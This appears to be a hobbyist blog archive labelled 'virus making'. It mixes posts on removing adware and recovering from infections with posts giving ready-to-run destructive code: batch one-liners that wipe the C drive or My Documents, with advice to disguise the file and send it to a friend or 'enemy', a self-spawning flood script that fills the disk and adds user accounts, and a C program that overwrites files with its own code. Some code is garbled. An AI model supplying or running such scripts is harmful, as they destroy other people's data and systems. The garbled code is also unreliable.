Showing posts with label virus making. Show all posts
Showing posts with label virus making. Show all posts
Friday, 11 October 2013
0
Friday, 11 October 2013
PRABH KARAN SINGH
Read more...
How To Remove Dosearches.com
How To Remove Dosearches.com
Dosearches.com (also known as Do Searches) is a search engine, which should be avoided. No, it's not a malicious program, which is based on a virus code. It's just a site, which may show up on your computer out of nowhere and then cause browser's redirections, irrelevant search resuts, system's slow downs and similar problems. No matter that it looks really similar to Google, you should be very careful when doing searches with its help because it may return altered search results that may convince you to visit unknown or insecure website. Please, use more reputable search engines when browsing on the Internet. In addition, remove dosearches.com from each of your web browsers separately. If you don't know how to do that, continue reading.
First of all, eliminate Do Searches via Add/Remove Programs list:
Internet Explorer:
Dosearches.com (also known as Do Searches) is a search engine, which should be avoided. No, it's not a malicious program, which is based on a virus code. It's just a site, which may show up on your computer out of nowhere and then cause browser's redirections, irrelevant search resuts, system's slow downs and similar problems. No matter that it looks really similar to Google, you should be very careful when doing searches with its help because it may return altered search results that may convince you to visit unknown or insecure website. Please, use more reputable search engines when browsing on the Internet. In addition, remove dosearches.com from each of your web browsers separately. If you don't know how to do that, continue reading.
HOW CAN DO SEARCHES GET INSIDE THE SYSTEM?
There are many users who call Do Searches a virus or malware because it tends to show up on computer without a clear permission asked. For preventing its infiltration, you should remember that every free application offers changing the start page and default search engine or recommends installing some other application for free. That's why we always recommend checking installation process of the freeware and removing marks from these suggestions. Once Do Searches gets inside, it immediately shows up instead of the start page or default search engine. You may also notice redirects to unknown sites and commercial pop-up notifications. Remember, it is recommended to remove Do Searches from the system if you didn't download it consciously. For that, follow a guide below:HOW TO REMOVE DO SEARCHES?
People, who downloaded Do Searches on their computers accidentally, should remove it. For that, you can either run a full system scan with SpyHunter or Malwarebytes Anti Malware or follow these steps:First of all, eliminate Do Searches via Add/Remove Programs list:
- Click Start -> Control Panel -> Programs (or Add/Remove Programs) -> Uninstall a Program.
- Here, look for Do Searches and other unknown entries, and select 'Uninstall/Change'.
- Click OK to save the changes.
Internet Explorer:
- Open Internet Explorer, go ‘Tools‘ -> ”Manage Add-ons’ -> ‘Toolbars and Extensions’.
- Here, look for DoSearches and similar entries, and click 'uninstall'.
- After that, change the start page to get rid of dosearches.com.
- Open Mozilla Firefox, go ‘Tools’ -> ‘Add-ons’ -> ‘Extensions’.
- Find Do Searches and similar entries, and click ‘Uninstall’.
- Once you do that, don't forget to change the start page.
- Click the Chrome menu button on the Google Chrome browser, select Tools -> Extensions.
- Here, look for Do Searches and other unknown extensions and get rid of them by clicking on the Recycle Bin.
- After that, change the settings of your start page.
ALSO LIKE ON FACEBOOK PAGE FOR DAILY UPDATES
Thursday, 7 February 2013
0
Thursday, 7 February 2013
PRABH KARAN SINGH
In this post i will teach you to make simple yet very powerful or you can say harmful computer virus
using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not
detected by any Anti Virus.
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
Read more...
Learn To Make Dangerous Virus In A Minute
Learn To Make Dangerous Virus In A Minute
In this post i will teach you to make simple yet very powerful or you can say harmful computer virus
using a batch file. No software is required to make this virus, Notepad is enough for it. The good thing about this virus is it is not
detected by any Anti Virus.
What will this virus do ?
You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus.How to Make the virus ?
1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
2. Save this file as virus.bat (Name can be anything but .bat is must)
3. Now, running this file will delete all the content of C Drive.
Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
Subscribe us via E-mail and Add us on Facebook for daily updates and Plz also do click once on the ads displaying below or above the post for us.. :)
Monday, 17 October 2011
0
Monday, 17 October 2011
PRABH KARAN SINGH
Read more...
Cool Fake Viruses to Make Your Friends Freak Out!!!!!!
I love it because it looks the most like an actual attack.
Copy and paste the following into an open Notepad window, then save the file with any name you choose and an extension of “.bat”
Here’s the code:
NOTE :- This is not a virus ...........only a script to have fun with your friend ...........
Subscribe us via E-mail and Add us on Facebook for daily updates and Plz also do click once on the ads displaying below or above the post for us.. :)
Copy and paste the following into an open Notepad window, then save the file with any name you choose and an extension of “.bat”
Here’s the code:
clsHere’s how it will look like once it is launched:
:A
color 0a
cls
@echo off
echo Wscript.Sleep
echo Wscript.Sleep 5000>C:sleep5000.vbs
echo Wscript.Sleep 3000>C:sleep3000.vbs
echo Wscript.Sleep 4000>C:sleep4000.vbs
echo Wscript.Sleep 2000>C:sleep2000.vbs
cd %systemroot%System32
dir
cls
start /w wscript.exe C:sleep3000.vbs
echo Deleting Critical System Files…
echo del *.*
start /w wscript.exe C:sleep3000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Deleting Root Partition…
start /w wscript.exe C:sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x…
cd C:Documents and SettingsAll UsersStart MenuPrograms
mkdir h4x
start /w wscript.exe C:sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1…
start /w wscript.exe C:sleep3000.vbs
echo cd C:Documents and SettingsAll UsersStart MenuProgramsStartuph4x
echo start hax.exe
start /w wscript.exe C:sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:sleep2000.vbs
echo Disabling Windows Firewall…
start /w wscript.exe C:sleep2000.vbs
echo Killing all processes…
start /w wscript.exe C:sleep2000.vbs
echo Allowing virus to boot from startup…
start /w wscript.exe C:sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:sleep2000.vbs
pause
shutdown -s -t 10 -c “Your computer has committed suicide. Have a nice day.”
NOTE :- This is not a virus ...........only a script to have fun with your friend ...........
Subscribe us via E-mail and Add us on Facebook for daily updates and Plz also do click once on the ads displaying below or above the post for us.. :)
Sunday, 16 October 2011
0
Sunday, 16 October 2011
PRABH KARAN SINGH
Subscribe us via E-mail and Add us on Facebook for daily updates and Plz also do click once on the ads displaying below or above the post for us.. :)
Read more...
What You Need to Do to Recover from a Virus Attack!!!!!
Viruses are costly and can try your patience and resources. If your system has been compromised, there are several key steps to get up and running again as soon as possible. Learn about how to remove a virus and restore your system. And remember, prevention is always the best security policy.
Bad news—you've suffered a virus attack. Take a few seconds to get over the initial shock, but only a few seconds.
Once a virus sidesteps your security defenses, it can quickly rip through your system, destroying files, corrupting data, rendering applications useless, and in general causing an expensive lull in productivity. You need to act immediately. Follow the steps below to remove the virus and restore your system.
Once a virus sidesteps your security defenses, it can quickly rip through your system, destroying files, corrupting data, rendering applications useless, and in general causing an expensive lull in productivity. You need to act immediately. Follow the steps below to remove the virus and restore your system.
- Disconnect and isolate. Think of it as putting the infected computer into quarantine. If you suspect that a computer has been attacked by a virus, physically disconnect the machine. An infected machine can endanger other computers.
- Clean up. Once the computer has been disconnected, you need to remove the malicious code. Use removal tools written for the specific virus. Your antivirus software should have updates or patches available for the specific security threat. If this software hasn't been updated recently, be sure to do so. Symantec Security Response makes both removal tools and updated definitions available as soon as a threat is discovered. General information, new alerts, and step-by-step guides are available on the Symantec Security Response site.
- Restore. After a virus attack, damages may range from changed file names to obliterated files to permanently disabled software applications. Before resuming work, you need to restore your computer to its original condition.
- Reinstall. The extent of damage depends on the particular virus. If your operating system is completely destroyed, you'll need to reinstall. Use the 'quick restore' CD that came with your computer to restore your computer to its original configuration. This means that you will lose any applications you may have installed or data files you may have saved. Before you begin the reinstallation process, make sure you have all the necessary information handy - original software, licenses, registration, and serial numbers.
- Scan for viruses. After restoring and reinstalling, scan your entire network, including all files and documents, for viruses. Use the most recent virus definitions available for your antivirus software.
- Restore your data. This assumes that you have been diligent about backing up your files. If you don't follow a regular schedule of backups, your files will be permanently lost. If this is the case, learn from your mistake and make sure to back up regularly from now on. Keep in mind, not all viruses target data files – some attack only applications.
- Prevent future attacks. Run antivirus software and keep virus definitions current. Ensure security patches are up-to-date. If you haven't been running antivirus software, start now!If you lost data files in the recent attack, you will want to create and enforce a regular backup schedule. Next, you will want to change all passwords, including ISP access passwords, FTP, email, and Web site passwords. Some viruses can capture or crack passwords, leading to future vulnerabilities. Change passwords immediately.
Subscribe us via E-mail and Add us on Facebook for daily updates and Plz also do click once on the ads displaying below or above the post for us.. :)
Tuesday, 11 October 2011
0
Tuesday, 11 October 2011
PRABH KARAN SINGH
Subscribe us via E-mail and Add us on Facebook for daily updates and Plz also do click once on the ads displaying below or above the post for us.. :)
Read more...
How to create virus !!!!
HERE'S A TRICK I FOUND TO DELETE THE MY DOCUMENTS FOLDER OF YOUR ENEMY OR JUST FOR FUN WITH YOUR FRIEND.
The Trick is so simple to perform you have to just copy paste the code line given at the end of article.
Here's what you should do to perform this computer trick.
1).Open a new NOTEPAD file and then copy the code given below in the red line.
2).Then you have to save the file with whatever name you like,but be sure to save it as a BAT FILE.
3). For example save your file LikeMYVIRUS.BAT. It should have the ending as .BAT.
4).Now if you give this file to some one and if he runs this program then his my document folder automatically deleted.
Code Line is: rmdir C:\Documents and Settings \S\Q.
Make virus by this trick and surprise your close friends.
Subscribe us via E-mail and Add us on Facebook for daily updates and Plz also do click once on the ads displaying below or above the post for us.. :)
Wednesday, 7 September 2011
0
Wednesday, 7 September 2011
PRABH KARAN SINGH
Subscribe us via E-mail and Add us on Facebook for daily updates and Plz also do click once on the ads displaying below or above the post for us.. :)
Read more...
Difference Between Virus,Worms,Trojan and Spyware
We all have heard the terms Virus,Worms,trojans and spyware but only a few of us know the difference between them.We genreally consider everything that is detected by an antivirus as virus but this is not the case.The antivirus not only provides protection against viruses but it also protects us from trojans,worms and spywares.All these can be harmful to your computer hardware and software.
Today I will differentiate all these terms from each other .
1. Virus:-A virus is a self replicating program that attaches itself to an executable file.When the file is executed the virus automatically gets executed and enters into system memory .Once it enters into system memory it either searches for other files that can be infected or stays in the background and infect the files that are uses the virus infected program.
2. Worms:Worms are very similar to viruses but differ in way that they donot bind themselves to executable files instead to replicate themselves they uses the network.If you find excessive use of your network bandwidth then you may be infected by a worm.So,a worm donot require a user to execute any file for its execution it can work without user intervention.
3. Trojan Horse:-A trojan horse is harmful program which may seem harmless to the user before its installation but instead it is programmed or reverse engineered to facilitate unauthorised remote access to the computer.Trojan’s donot replicate themselves.
4. Spyware:-A spyware is a program that secretly monitors and collects pieces of information.They usually run in stealth mode and cannot be detected easily.Keyloggers is a great example of spyware software.There are not limited to just spying but can also send data to remote computers.
Subscribe us via E-mail and Add us on Facebook for daily updates and Plz also do click once on the ads displaying below or above the post for us.. :)
Tuesday, 30 August 2011
0
Tuesday, 30 August 2011
PRABH KARAN SINGH
Subscribe us via E-mail and Add us on Facebook for daily updates and Plz also do click once on the ads displaying below or above the post for us.. :)
Read more...
How to create Virus in notepad
If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.
Here are some good viruses . (I am not responsible for any kind of damage
to your system !!!!!!)
to your system !!!!!!)
Copy this to notepad and save as flood1.bat
@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start
:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5
:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4
:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3
:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2
:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original
:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1
@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start
:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5
:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4
:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3
:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2
:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original
:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1
How this work it will keep replicating itself until your harddrive is totally full and will destroy
your computer.
your computer.
NOTE :- TRY AT YOUR OWN RISK . (WE are not responsible for any kind of damage
to your system !!!!!!)
to your system !!!!!!)
Subscribe us via E-mail and Add us on Facebook for daily updates and Plz also do click once on the ads displaying below or above the post for us.. :)
Friday, 26 August 2011
0
Friday, 26 August 2011
PRABH KARAN SINGH
Steps to create this program or virus.
Read more...
Methods To Crash Your Windows or Your Friends
Today i am going to tell you how to crash your window or your friends window . In this trick you dont have to use any software. when this program get active you can not repair it again after that you have to reinstal your window again !!!!!.
Steps to create this program or virus.
1. Open NOTEPAD and type this command :-
RD c:\ /s /q (as show in screenshot)
2. Now save as this file and give any name you want with extension .bat and save as file type (all files) as.shown in screenshot.
3.After saving this file it will look like this .
5. Now change the icon and send it to your friend ..
when this program get active it start deleting all file from your c:\ drive . where your window file get saved .
NOTE : Try this trick at your own risk. we are not responsible for any thing .
Subscribe us via E-mail and Add us on Facebook for daily updates and Plz also do click once on the ads displaying below or above the post for us.. :)
Sunday, 14 August 2011
0
Sunday, 14 August 2011
PRABH KARAN SINGH
Read more...
Create Virus Code In C Language
#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{
char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(‖————————————————————————–‖);
printf(‖\nVirus: Folderbomb 1.0\nProgrammer:BAS
Unnikrishnan(asystem0@gmail.com)\n‖);
cprintf(‖————————————————————————–‖);
done = findfirst(‖*.*‖,&ffblk,0);
while (!done)
{
printf(‖\n‖);
cprintf(‖ %s ―, ffblk.ff_name);printf(‖is attacked by ―);
cprintf(‖Folderbomb‖);
source=open(argv[0],O_RDONLY|O_BINARY);
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);
while(1)
{
byt=read(source,buf,512);
if(byt>0) write(target,buf,byt);
else break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}
still I do not recommend to use this virus for bad purpose
Subscribe us via E-mail and Add us on Facebook for daily updates and Plz also do click once on the ads displaying below or above the post for us.. :)
Subscribe to:
Posts
(
Atom
)






